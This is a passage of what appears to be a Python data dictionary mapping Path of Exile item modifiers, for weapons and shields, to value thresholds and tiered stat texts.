"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Always Freezes Enemies on Hit": [(20, 'Always Freezes Enemies on Hit'), (40, 'Always Freezes Enemies on Hit'), (200, 'Always Freezes Enemies on Hit\n(8 - 10)% increased Freeze Duration on Enemies')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"Shield": {
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% Chance to Block Spell Damage": [(28, '(2 - 3)% Chance to Block Spell Damage'), (50, '(4 - 5)% Chance to Block Spell Damage')],
"#% additional Physical Damage Reduction": [(6, '(-15 - -11) Physical Damage taken from Attacks'), (12, '(-20 - -16) Physical Damage taken from Attacks'), (50, '(-25 - -21) Physical Damage taken from Attacks')],
"#% chance to Avoid Cold Damage when Hit": [(14, '(11 - 12) to Cold Resistance'), (27, '(13 - 14) to Cold Resistance'), (50, '(15 - 16) to Cold Resistance\n(3 - 5)% chance to Avoid Cold Damage when Hit')],
"#% chance to Avoid Elemental Ailments": [(30, '(15 - 20)% reduced Elemental Ailment Duration on you'), (60, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you\n(16 - 25)% chance to Avoid Elemental Ailments')],
"#% chance to Avoid Fire Damage when Hit": [(14, '(11 - 12) to Fire Resistance'), (27, '(13 - 14) to Fire Resistance'), (50, '(15 - 16) to Fire Resistance\n(3 - 5)% chance to Avoid Fire Damage when Hit')],
"#% chance to Avoid Lightning Damage when Hit": [(14, '(11 - 12) to Lightning Resistance'), (27, '(13 - 14) to Lightning Resistance'), (50, '(15 - 16) to Lightning Resistance\n(3 - 5)% chance to Avoid Lightning Damage when Hit')],
"#% chance to Avoid being Poisoned": [(55, '(14 - 16)% chance to Avoid being Poisoned'), (110, '(18 - 21)% chance to Avoid being Poisoned'), (200, '(22 - 25)% chance to Avoid being Poisoned')],
"#% chance to Avoid being Stunned": [(20, '(10 - 11)% chance to Avoid being Stunned'), (40, '(12 - 13)% chance to Avoid being Stunned'), (55, '(14 - 15)% chance to Avoid being Stunned'), (150, '(14 - 15)% chance to Avoid being Stunned\n100% chance to avoid Bleeding')],
"#% chance to Dodge Attack Hits": [(10, '2% chance to Dodge Attack Hits'), (20, '(4 - 5)% chance to Dodge Attack Hits')],
"#% chance to Dodge Spell Hits": [(10, '2% chance to Dodge Spell Hits'), (20, '(4 - 5)% chance to Dodge Spell Hits')],
"#% chance to avoid Bleeding": [(55, '(14 - 16)% chance to avoid Bleeding'), (110, '(18 - 21)% chance to avoid Bleeding'), (200, '(22 - 25)% chance to avoid Bleeding')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(20, '(12 - 13)% increased Attack Damage\n(12 - 13)% increased Spell Damage'), (40, '(14 - 16)% increased Attack Damage\n(14 - 16)% increased Spell Damage'), (100, '(17 - 20)% increased Attack Damage\n(17 - 20)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(11, '3% increased Attack and Cast Speed'), (22, '4% increased Attack and Cast Speed'), (50, '5% increased Attack and Cast Speed\n(5 - 8)% chance to gain Onslaught for 4 seconds on Kill')],
"#% chance to gain a Power Charge when you Block": [(25, '(3 - 4)% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% chance to gain an additional Vaal Soul on Kill": [(50, 'Immune to Curses if Corrupted')],
"#% increased Armour": [(100, '(15 - 18)% increased Armour'), (175, '(19 - 22)% increased Armour'), (250, '(23 - 26)% increased Armour'), (325, '(27 - 30)% increased Armour'), (400, '(30 - 35)% increased Armour'), (1000, '(4 - 5) Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage')],
"#% increased Armour and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5) Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\nSocketed Gems have 10% reduced Mana Reservation')],
"#% increased Armour and Evasion": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating'), (1000, '(4 - 5) Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\n(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits')],
"#% increased Armour, Evasion and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5) Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\n(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits\nSocketed Gems have 10% reduced Mana Reservation')],
"#% increased Attack Damage": [(60, '(23 - 26)% increased Attack Damage'), (90, '(27 - 30)% increased Attack Damage'), (500, '(31 - 35)% increased Attack Damage')],
"#% increased Attack Speed": [(20, '3% increased Attack Speed'), (30, '4% increased Attack Speed'), (100, '5% increased Attack Speed')],
"#% increased Attack and Cast Speed": [(15, '4% increased Attack and Cast Speed'), (50, '5% increased Attack and Cast Speed')],
"#% increased Cast Speed": [(20, '3% increased Cast Speed'), (30, '4% increased Cast Speed'), (100, '5% increased Cast Speed')],
"#% increased Cold Damage": [(50, '8% increased Cold Damage'), (100, '(9 - 10)% increased Cold Damage'), (150, '(11 - 12)% increased Cold Damage'), (200, '(13 - 14)% increased Cold Damage'), (500, '(15 - 16)% increased Cold Damage\n(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Effect of your Curses": [(13, 'Curse Skills have (10 - 15)% increased Skill Effect Duration'), (26, 'Curse Skills have (16 - 20)% increased Skill Effect Duration'), (50, '(10 - 15)% increased Flammability Curse Effect\n(10 - 15)% increased Frostbite Curse Effect\n(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Elemental Damage": [(20, '8% increased Elemental Damage'), (40, '(9 - 10)% increased Elemental Damage'), (60, '(11 - 12)% increased Elemental Damage'), (80, '(13 - 14)% increased Elemental Damage'), (500, '(15 - 16)% increased Elemental Damage\n(20 - 30)% increased Elemental Weakness Curse Effect')],
"#% increased Energy Shield": [(100, '(15 - 16)% increased Energy Shield'), (175, '(17 - 18)% increased Energy Shield'), (250, '(19 - 20)% increased Energy Shield'), (325, '(21 - 22)% increased Energy Shield'), (400, '(23 - 25)% increased Energy Shield'), (1000, 'Socketed Gems have 10% reduced Mana Reservation')],
"#% increased Evasion Rating": [(100, '(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Evasion Rating'), (1000, '(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits')],
"#% increased Evasion and Energy Shield": [(100, '(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits\nSocketed Gems have 10% reduced Mana Reservation')],
"#% increased Fire Damage": [(50, '8% increased Fire Damage'), (100, '(9 - 10)% increased Fire Damage'), (150, '(11 - 12)% increased Fire Damage'), (200, '(13 - 14)% increased Fire Damage'), (500, '(15 - 16)% increased Fire Damage\n(20 - 30)% increased Flammability Curse Effect')],
"#% increased Global Physical Damage": [(20, '8% increased Global Physical Damage'), (40, '(9 - 10)% increased Global Physical Damage'), (60, '(11 - 12)% increased Global Physical Damage'), (80, '(13 - 14)% increased Global Physical Damage'), (500, '(15 - 16)% increased Global Physical Damage\n(20 - 30)% increased Vulnerability Curse Effect')],
"#% increased Lightning Damage": [(50, '8% increased Lightning Damage'), (100, '(9 - 10)% increased Lightning Damage'), (150, '(11 - 12)% increased Lightning Damage'), (200, '(13 - 14)% increased Lightning Damage'), (500, '(15 - 16)% increased Lightning Damage\n(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.3% of Mana Regenerated per second')],
"#% increased Spell Damage": [(150, '(23 - 26)% increased Spell Damage'), (200, '(27 - 30)% increased Spell Damage'), (500, '(31 - 35)% increased Spell Damage')],
"#% increased Stun and Block Recovery": [(30, '(10 - 12)% increased Stun and Block Recovery'), (60, '(13 - 15)% increased Stun and Block Recovery'), (90, '(16 - 18)% increased Stun and Block Recovery'), (110, '(19 - 21)% increased Stun and Block Recovery'), (130, '(22 - 25)% increased Stun and Block Recovery'), (160, '(22 - 25)% increased Stun and Block Recovery\nUnwavering Stance')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(1 - 2) to Minimum Endurance Charges\n(1 - 2) to Minimum Frenzy Charges\n(1 - 2) to Minimum Power Charges')],
"#% reduced Damage taken from Damage Over Time": [(6, '(5 - 6) to Chaos Resistance'), (12, '(7 - 8) to Chaos Resistance'), (20, '(9 - 10) to Chaos Resistance')],
"#% reduced Elemental Ailment Duration on you": [(40, '(15 - 20)% reduced Elemental Ailment Duration on you'), (75, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you')],
"+# Life gained when you Block": [(150, '(15 - 25) Life gained when you Block'), (250, '(26 - 35) Life gained when you Block'), (500, 'Recover (3 - 5)% of your Maximum Life when you Block')],
"+# Mana gained when you Block": [(50, '(5 - 10) Mana gained when you Block'), (100, '(11 - 15) Mana gained when you Block'), (200, 'Recover (4 - 8)% of your maximum Mana when you Block')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (2000, '(251 - 350) to Accuracy Rating')],
"+# to Armour": [(200, '(15 - 20) to Armour'), (400, '(21 - 30) to Armour'), (600, '(31 - 40) to Armour'), (800, '(41 - 55) to Armour'), (1100, '(56 - 70) to Armour\n2% additional Physical Damage Reduction'), (1450, '(56 - 70) to Armour\n3% additional Physical Damage Reduction'), (2000, '(56 - 70) to Armour\n4% additional Physical Damage Reduction')],
"+# to Armour during Soul Gain Prevention": [(8000, '(21 - 30) to Armour'), (15000, '(31 - 40) to Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '6% increased Dexterity\n1 to Maximum Frenzy Charges')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(175, '(15 - 20) to Evasion Rating'), (375, '(21 - 30) to Evasion Rating'), (575, '(31 - 40) to Evasion Rating'), (775, '(41 - 55) to Evasion Rating'), (1050, '(56 - 70) to Evasion Rating\n2 chance to Evade Attacks'), (1400, '(56 - 70) to Evasion Rating\n3 chance to Evade Attacks'), (2000, '(56 - 70) to Evasion Rating\n4 chance to Evade Attacks')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '6% increased Intelligence\n1 to Maximum Power Charges')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '6% increased Strength\n1 to Maximum Endurance Charges')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 10) to maximum Energy Shield'), (100, '(11 - 14) to maximum Energy Shield'), (150, '(15 - 18) to maximum Energy Shield'), (200, '(19 - 23) to maximum Energy Shield'), (300, '(24 - 30) to maximum Energy Shield\n(0.6 - 0.7)% of Energy Shield Regenerated per second'), (370, '(24 - 30) to maximum Energy Shield\n(0.8 - 0.9)% of Energy Shield Regenerated per second'), (500, '(24 - 30) to maximum Energy Shield\n1.0% of Energy Shield Regenerated per second')],
"+# to maximum Life": [(100, '(8 - 10) to maximum Life'), (175, '(11 - 14) to maximum Life'), (250, '(15 - 19) to maximum Life'), (325, '(20 - 24) to maximum Life'), (400, '(25 - 30) to maximum Life\n4% increased maximum Life'), (1000, '(5 - 6)% increased maximum Life')],
"+# to maximum Mana": [(50, '(8 - 10) to maximum Mana'), (100, '(11 - 14) to maximum Mana'), (150, '(15 - 19) to maximum Mana'), (175, '(20 - 24) to maximum Mana'), (200, '(7 - 8)% increased maximum Mana\n(6 - 8)% increased Attack Damage per 500 Maximum Mana\n(6 - 8)% increased Spell Damage per 500 Maximum Mana'), (500, '(7 - 8)% increased maximum Mana')],
"+#% Chance to Block": [(28, '(2 - 3) Chance to Block Attack Damage'), (50, '(4 - 5) Chance to Block Attack Damage')],
"+#% Chance to Block Projectile Attack Damage": [(28, '(2 - 3) Chance to Block Attack Damage\n(2 - 3)% Chance to Block Spell Damage'), (50, '(4 - 5) Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n2 to maximum Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n3 to maximum Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n3 to maximum Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n3 to maximum Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"+#% to all Elemental Resistances": [(15, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance'), (30, '(13 - 14) to Fire Resistance\n(13 - 14) to Cold Resistance\n(13 - 14) to Lightning Resistance'), (45, '(15 - 16) to Fire Resistance\n(15 - 16) to Cold Resistance\n(15 - 16) to Lightning Resistance'), (100, '(15 - 16) to Fire Resistance\n(15 - 16) to Cold Resistance\n(15 - 16) to Lightning Resistance\n2 to all maximum Resistances')],
"Adds # to # Cold Damage": [(20, '8% increased Cold Damage'), (40, '(9 - 10)% increased Cold Damage'), (100, '(11 - 12)% increased Cold Damage')],
